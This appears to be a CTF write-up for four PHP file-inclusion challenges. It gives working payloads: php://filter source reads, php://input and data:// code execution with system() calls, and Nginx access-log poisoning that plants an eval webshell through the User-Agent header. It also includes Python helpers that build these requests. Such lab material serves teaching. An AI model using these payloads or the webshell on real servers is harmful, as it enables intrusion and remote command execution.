Web78-81

Web78

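This is the most basic file-inclusion challenge. Requesting ?file=flag.php directly does not work, presumably because include executes flag.php as PHP and the flag sits in a variable or comment that is never printed. Instead, use the php://filter payload we covered earlier in the command-execution section, which returns the file Base64-encoded so that it is displayed rather than executed.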

?file=php://filter/read=convert.base64-encode/resource=flag.php
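
To make the round trip concrete, here is a minimal Python sketch that builds the payload URL and decodes the Base64 text the page prints back. The base URL and the helper names are placeholders for illustration, not part of the challenge.

```python
import base64
from urllib.parse import urlencode


def build_filter_url(base_url: str, target: str = "flag.php") -> str:
    """Return base_url with a php://filter payload in the `file` parameter."""
    payload = f"php://filter/read=convert.base64-encode/resource={target}"
    # Keep ':', '/' and '=' unescaped so the payload stays readable.
    return f"{base_url}?{urlencode({'file': payload}, safe=':/=')}"


def decode_response(body: str) -> str:
    """Decode the Base64 text returned by the page into PHP source."""
    return base64.b64decode(body.strip()).decode("utf-8", errors="replace")


# Hypothetical target; replace with the real challenge address.
print(build_filter_url("http://example.test/"))
```

Paste the Base64 blob from the response into decode_response to read the source of flag.php.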

Web79

This challenge filters php. The line $file = str_replace("php", "???", $file); replaces every occurrence of php in $file with ???.

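My first idea was to reuse the previous payload with php changed to Php, since str_replace is case-sensitive. But file names on Linux are case-sensitive too, so flag.php and flag.Php are different files, and that approach fails.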
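
The effect of the filter on both variants can be checked offline. This is a small sketch in which Python's str.replace stands in for PHP's str_replace (both are case-sensitive); filter_file is a hypothetical name for illustration.

```python
def filter_file(file: str) -> str:
    """Python stand-in for PHP's str_replace("php", "???", $file)."""
    return file.replace("php", "???")


original = "php://filter/read=convert.base64-encode/resource=flag.php"
mixed_case = "Php://filter/read=convert.base64-encode/resource=flag.Php"

# Both lowercase "php" occurrences are rewritten, which breaks the wrapper name.
print(filter_file(original))
# The mixed-case string passes through untouched, but it now names flag.Php,
# which does not exist on a case-sensitive file system.
print(filter_file(mixed_case))
```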

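Instead we can use PHP's php://input wrapper, which gives access to the raw body of a POST request. As I understand it, when php://input is passed to include, the POST body is executed as PHP code (this relies on allow_url_include being enabled). The filter only touches the file parameter of the GET request, so any php in the POST body is left alone, and since wrapper names are case-insensitive, Php://input gets past the filter.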

?file=Php://input

POST body: <?php system("tac flag.php");?>
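
If no browser plugin is at hand, the same request can be put together with Python's standard library. This is only a sketch: the base URL is a placeholder, build_input_request is a hypothetical helper, and the request is built but not sent.

```python
from urllib.request import Request


def build_input_request(base_url: str, php_code: str) -> Request:
    """Build a POST request whose raw body is the PHP code to run."""
    # The mixed-case wrapper name slips past the case-sensitive filter.
    url = f"{base_url}?file=Php://input"
    return Request(url, data=php_code.encode("utf-8"), method="POST")


req = build_input_request("http://example.test/", '<?php system("tac flag.php");?>')
print(req.get_method(), req.full_url)
# To actually send it: urllib.request.urlopen(req).read()
```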

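Alternatively, we can use PHP's data:// wrapper, available since PHP 5.2.0. It carries the data inline in the URL, and if that data is PHP code passed to include, the code is executed. The syntax is: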

data://[<MIME-type>][;charset=<encoding>][;base64],<data>

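MIME-type: the type of the data; defaults to text/plain.

charset: the character encoding of the data, e.g. utf-8.

base64: add this flag if the data is Base64-encoded.

data: the actual content, e.g. data://text/plain;base64,xxxx where xxxx is the Base64-encoded data.

So our payload is the one below. Note that the php in flag.php is also rewritten to ???, but the shell treats flag.??? as a wildcard pattern that still matches flag.php: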

?file=data://text/plain,<?=system("cat%20flag.php");?>
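
The ;base64 form described above avoids relying on the wildcard, because the encoded payload normally contains no literal php. A minimal sketch, assuming a placeholder base URL and a hypothetical helper name:

```python
import base64
from urllib.parse import quote


def build_data_url(base_url: str, php_code: str) -> str:
    """Wrap php_code in a Base64 data:// payload for the `file` parameter."""
    encoded = base64.b64encode(php_code.encode("utf-8")).decode("ascii")
    payload = f"data://text/plain;base64,{encoded}"
    if "php" in payload:
        # Rare, but the Base64 text itself could happen to contain "php".
        raise ValueError("payload contains 'php' and would be rewritten by the filter")
    # Percent-encode '+' (otherwise read as a space in a query string) and '='.
    return f"{base_url}?file=" + quote(payload, safe=":/;,")


code = '<?php system("tac flag.php");?>'
url = build_data_url("http://example.test/", code)
print(url)
```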

Web80

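This one additionally filters data, so the data:// payload is out, but the Php://input payload from the previous challenge works unchanged.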

Web81



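This challenge additionally filters :, so the wrappers are all out. We need a new technique here: getting a shell through the server logs (log poisoning).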

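For Apache, the access log is commonly at /var/log/apache2/access.log (Debian/Ubuntu) or /var/log/httpd/access_log (RHEL/CentOS).

For Nginx, the logs are at /var/log/nginx/access.log and /var/log/nginx/error.log.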

A browser plugin tells us that the web server here is Nginx.

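First we include the log directly and see that it records parts of our requests: the HTTP request line, User-Agent, Referer, and other client-supplied information. So if one of our requests contains malicious PHP code, that code is executed the next time the log is included.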

?file=/var/log/nginx/access.log

Use a plugin to set the User-Agent header to the malicious code:

<?php @eval($_REQUEST['cmd']);?>

After sending that request, include the log again and run commands via POST:

cmd=system("ls");
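
The two steps can also be scripted. The sketch below only builds the two requests with Python's standard library and does not send them; the base URL and the helper names are assumptions for illustration, while the log path and webshell are the ones used above.

```python
from urllib.parse import urlencode
from urllib.request import Request

LOG_PATH = "/var/log/nginx/access.log"
WEBSHELL = "<?php @eval($_REQUEST['cmd']);?>"


def build_poison_request(base_url: str) -> Request:
    """Step 1: a plain GET whose User-Agent carries the PHP code into the log."""
    return Request(base_url, headers={"User-Agent": WEBSHELL})


def build_exec_request(base_url: str, command: str) -> Request:
    """Step 2: include the log and pass the command as the POST field `cmd`."""
    body = urlencode({"cmd": command}).encode("ascii")
    return Request(f"{base_url}?file={LOG_PATH}", data=body, method="POST")


poison = build_poison_request("http://example.test/")
run = build_exec_request("http://example.test/", 'system("ls");')
print(run.full_url, run.data)
# To actually send them: urllib.request.urlopen(poison), then urlopen(run).read()
```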